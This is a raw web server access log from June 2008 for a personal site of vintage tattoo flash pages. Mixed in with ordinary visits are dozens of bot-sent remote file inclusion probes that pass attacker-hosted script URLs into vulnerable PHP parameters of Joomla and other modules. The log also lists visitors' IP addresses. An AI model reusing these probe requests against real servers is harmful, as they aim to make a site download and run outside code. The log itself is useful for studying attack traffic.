71.102.211.41 - - [11/Jun/2008:19:00:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.msn.com/results.aspx?q=vintage+tattoo+flash&FORM=MSNH""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:00:45 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:00:45 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:00:46 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
74.6.22.89 - - [11/Jun/2008:19:01:27 -0500] "GET /logs/access_log.1207785600 HTTP/1.0" 200 208700 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.1.202.61 - - [11/Jun/2008:19:13:56 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
200.1.202.61 - - [11/Jun/2008:19:13:57 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
71.102.211.41 - - [11/Jun/2008:19:25:56 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://search.msn.com/results.aspx?q=vintage+tattoo+flash&FORM=MSNH""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:25:57 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:25:57 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:25:57 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:25:57 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:25:57 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:09 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:13 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:13 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:13 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:13 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:13 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:13 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:13 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
71.102.211.41 - - [11/Jun/2008:19:26:13 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0)"
207.69.137.40 - - [11/Jun/2008:19:37:18 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4TSHB_enUS218US218&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:21 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:21 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:35 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop)"
207.69.137.40 - - [11/Jun/2008:19:37:57 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:59 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:59 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:59 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:59 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:59 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:59 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:37:59 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:38:00 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:38:07 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:38:11 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:39:35 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:39:36 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:39:37 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.69.137.40 - - [11/Jun/2008:19:39:37 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
64.237.105.23 - - [11/Jun/2008:19:43:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
64.237.105.23 - - [11/Jun/2008:19:43:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
64.237.105.23 - - [11/Jun/2008:19:43:54 -0500] "GET //skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
64.237.105.23 - - [11/Jun/2008:19:43:54 -0500] "GET //skin/zero_vote/error.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
62.75.158.23 - - [11/Jun/2008:19:51:26 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.69"
62.75.158.23 - - [11/Jun/2008:19:51:26 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.69"
87.106.98.71 - - [11/Jun/2008:19:51:41 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
87.106.98.71 - - [11/Jun/2008:19:51:41 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
203.200.89.107 - - [11/Jun/2008:19:53:13 -0500] "GET /logs/access_log.1208649600//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 341 "-""libwww-perl/5.65"
203.200.89.107 - - [11/Jun/2008:19:53:19 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
203.200.89.107 - - [11/Jun/2008:19:53:19 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
203.200.89.107 - - [11/Jun/2008:19:54:45 -0500] "GET /logs/access_log.1204156800//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 341 "-""libwww-perl/5.65"
74.53.240.146 - - [11/Jun/2008:19:58:02 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
74.53.240.146 - - [11/Jun/2008:19:58:03 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
74.6.22.89 - - [11/Jun/2008:19:58:04 -0500] "GET /memorial/index.htm HTTP/1.0" 200 817 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.230.197.245 - - [11/Jun/2008:20:00:13 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
66.230.197.245 - - [11/Jun/2008:20:00:13 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
87.106.98.71 - - [11/Jun/2008:20:01:04 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
87.106.98.71 - - [11/Jun/2008:20:01:04 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
209.132.97.196 - - [11/Jun/2008:20:04:39 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""WebRingChecker/1.71 LWP/5.79"
87.106.101.24 - - [11/Jun/2008:20:05:28 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
87.106.101.24 - - [11/Jun/2008:20:05:29 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
64.38.46.234 - - [11/Jun/2008:20:07:21 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:20:07:21 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
190.34.160.226 - - [11/Jun/2008:20:11:16 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
190.34.160.226 - - [11/Jun/2008:20:11:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
190.34.160.226 - - [11/Jun/2008:20:11:19 -0500] "GET //skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
190.34.160.226 - - [11/Jun/2008:20:11:20 -0500] "GET //skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.149.241.207 - - [11/Jun/2008:20:12:15 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
89.149.241.207 - - [11/Jun/2008:20:12:16 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
64.38.46.234 - - [11/Jun/2008:20:13:59 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:20:13:59 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
72.36.222.34 - - [11/Jun/2008:20:15:51 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
72.36.222.34 - - [11/Jun/2008:20:15:51 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
210.48.67.39 - - [11/Jun/2008:20:15:56 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
210.48.67.39 - - [11/Jun/2008:20:15:56 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
72.55.153.109 - - [11/Jun/2008:20:17:43 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
72.55.153.109 - - [11/Jun/2008:20:17:43 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
194.77.80.38 - - [11/Jun/2008:20:22:39 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://fsm.upsi.edu.my/db/albid.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
64.38.46.234 - - [11/Jun/2008:20:24:57 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 352 "-""libwww-perl/5.810"
64.38.46.234 - - [11/Jun/2008:20:24:57 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 347 "-""libwww-perl/5.810"
66.249.70.213 - - [11/Jun/2008:20:26:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.213 - - [11/Jun/2008:20:26:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.89 - - [11/Jun/2008:20:29:53 -0500] "GET /logs/access_log.1172275200 HTTP/1.0" 200 152570 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.46.207.163 - - [11/Jun/2008:20:31:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?q=vintage+tattoo+flash&btnG=Search&hl=en&safe=off&sa=2""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:31:59 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:31:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:04 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:04 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:04 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:05 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:05 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:05 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:05 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:05 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:05 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:05 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:05 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
68.46.207.163 - - [11/Jun/2008:20:32:13 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
